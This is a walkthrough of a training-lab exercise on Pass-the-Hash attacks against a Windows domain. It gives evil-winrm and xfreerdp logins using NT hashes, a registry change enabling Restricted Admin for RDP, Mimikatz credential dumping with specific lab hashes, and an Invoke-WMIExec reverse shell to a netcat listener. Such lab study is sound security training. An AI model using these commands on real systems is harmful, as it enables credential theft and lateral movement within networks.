
Pass the Hash (PtH)

ℹ️ Information

Question

Access the target machine using any Pass-the-Hash tool. Submit the contents of the file located at C:\pth.txt.

Provided credentials: Administrator:30B3783CE2ABF1AF70F77D0660CF3453

📋 Walkthrough

evil-winrm -i 10.129.167.241 -u Administrator -H 30B3783CE2ABF1AF70F77D0660CF3453
Answer

[REDACTED]

Question

Try to connect via RDP using the Administrator hash. What is the name of the registry value that must be set to 0 for PTH over RDP to work? Change the registry key value and connect using the hash with RDP. Submit the name of the registry value name as the answer.

📋 Walkthrough

xfreerdp /v:10.129.167.241 /u:Administrator /pth:30B3783CE2ABF1AF70F77D0660CF3453
This fails with an account restrictions error: RDP only accepts an NT hash when Restricted Admin mode is enabled on the target, and it is off by default. Enable it from the evil-winrm session by setting DisableRestrictedAdmin to 0:
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f
Then retry the xfreerdp command above. This is a persistent configuration change on the target that also lets anyone else holding the hash log in over RDP, so note it for cleanup (delete the value or set it back to 1) at the end of the engagement.

Answer

DisableRestrictedAdmin

Question

Connect via RDP and use Mimikatz located in c:\tools to extract the hashes presented in the current session. What is the NTLM/RC4 hash of David's account?

📋 Walkthrough

From an elevated command prompt in the RDP session (privilege::debug needs SeDebugPrivilege), run c:\tools\mimikatz.exe and then:
privilege::debug
sekurlsa::logonpasswords
David's NTLM hash is listed in the msv block of his logon session.
Answer

[REDACTED]

Question

Using David's hash, perform a Pass the Hash attack to connect to the shared folder \\DC01\david and read the file david.txt.

📋 Walkthrough

sekurlsa::pth /user:David /ntlm:[HASH] /domain:INLANEFREIGHT /run:cmd.exe
The spawned cmd.exe carries David's NT hash as its network credential, so the share can be mapped without a /user: option (adding /user: would make net use prompt for a password):
net use Z: \\DC01\david
type Z:\david.txt

Answer

[REDACTED]

Question

Using Julio's hash, perform a Pass the Hash attack to connect to the shared folder \\DC01\julio and read the file julio.txt.

📋 Walkthrough

Hashes extracted from the mimikatz output in the previous step, each ready to be injected with sekurlsa::pth:
sekurlsa::pth /user:David /ntlm:c39f2beb3d2ec06a62cb887fb391dee0 /domain:INLANEFREIGHT /run:cmd.exe
sekurlsa::pth /user:julio /ntlm:64f12cddaa88057e06a81b54e73b949b /domain:INLANEFREIGHT /run:cmd.exe
sekurlsa::pth /user:john /ntlm:c4b0e1b10c7ce2c4723b4e2407ef81a2 /domain:INLANEFREIGHT /run:cmd.exe
Run the julio line, then in the cmd.exe it spawns map the share and read the flag (same drive letter in both commands):
net use S: \\DC01\julio
type S:\julio.txt

Answer

[REDACTED]

Question

Using Julio's hash, perform a Pass the Hash attack, launch a PowerShell console and import Invoke-TheHash to create a reverse shell to the machine you are connected via RDP (the target machine, DC01, can only connect to MS01). Use the tool nc.exe located in c:\tools to listen for the reverse shell. Once connected to the DC01, read the flag in C:\julio\flag.txt.

📋 Walkthrough

First start the listener in the RDP session on MS01 with the provided netcat, for example C:\tools\nc.exe -lvnp 8001 (the port is arbitrary). Then, from a cmd.exe spawned with Julio's hash (sekurlsa::pth as above), launch PowerShell, import Invoke-TheHash from the directory it is stored in, and execute the reverse shell on DC01 via WMI. The -Command payload is a base64-encoded PowerShell reverse shell pointing at MS01 and the listener port; it is omitted here:
powershell
Import-Module .\Invoke-TheHash.psd1
Invoke-WMIExec -Target DC01 -Domain INLANEFREIGHT -Username julio -Hash [HASH] -Command "powershell -e <base64-encoded reverse shell>"
Once the shell calls back to nc.exe, read C:\julio\flag.txt on DC01.
Answer

[REDACTED]